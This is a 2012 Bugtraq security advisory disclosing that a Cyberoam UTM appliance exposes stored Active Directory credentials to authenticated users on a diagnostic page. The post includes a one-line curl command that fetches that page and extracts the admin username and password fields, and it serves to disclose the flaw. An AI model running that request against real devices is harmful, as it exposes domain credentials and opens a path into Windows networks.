[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Cyberoam Unified Threat Management: Insecure Password Handling
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Cyberoam Unified Threat Management: Insecure Password Handling
- From: Saurabh Harit <saurabh.harit@xxxxxxxxx>
- Date: Wed, 21 Mar 2012 08:41:13 +0200
Hi,
Please find below the details of a vulnerability I discovered in
Cyberoam UTM device. The Vendor was notified, however I did not
receive any response from Vendor despite repeated email reminders.
SECURITY ADVISORY: cyberoam-utm-insecure-password-handling
Affected Software: Cyberoam CR50ia 10.01.0 build 678
Vulnerability: Insecure Password Handling
Severity: High
Release Date: Unreleased
I. Background
~~~~~~~~~~~~~
"Cyberoam Unified Threat Management appliances offer assured security,
connectivity and productivity to Small Office-Home Office (SOHO) and
Remote Office-Branch Office (ROBO) users by allowing user
identity-based policy controls."
Cyberoam UTM integrates with Active Directory. In order to query data
from a configured AD, domain credentials are stored within the device.
These credentials are retrievable by an authenticated user.
II. Description
~~~~~~~~~~~~~~~
Domain credentials are stored on the device and passed to web
clientson a diagnostic page (Identity --> Authentication -->
Authentication Server --> /Select Configured AD/ ). Authenticated
clients can thus easily access stored credentials.
A trivial check for this follows (replace cookie value):
curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah"
"http://<webserver>/corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1"|egrep
'(adminusername|passwdvalue)'
III. Impact
~~~~~~~~~~~
The vulnerability allows a malicious user to access potentially
privileged domain credentials. Should default passwords not be
changed, then this is a trivial entry point onto a Windows domain.
IV. Remediation
~~~~~~~~~~~~~~~
Do not return stored credentials to the browser.
V. Disclosure
~~~~~~~~~~~~~
Reported By: Saurabh Harit, Senior Security Analyst, SensePost
Discovery Date: 2011-11-01
VI. References
~~~~~~~~~~~~~
[1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp
Thanks & Regards,
-------------------------------------------------------
Saurabh Harit
Senior Security Analyst
SensePost Pvt Ltd
Phone: +27 768006821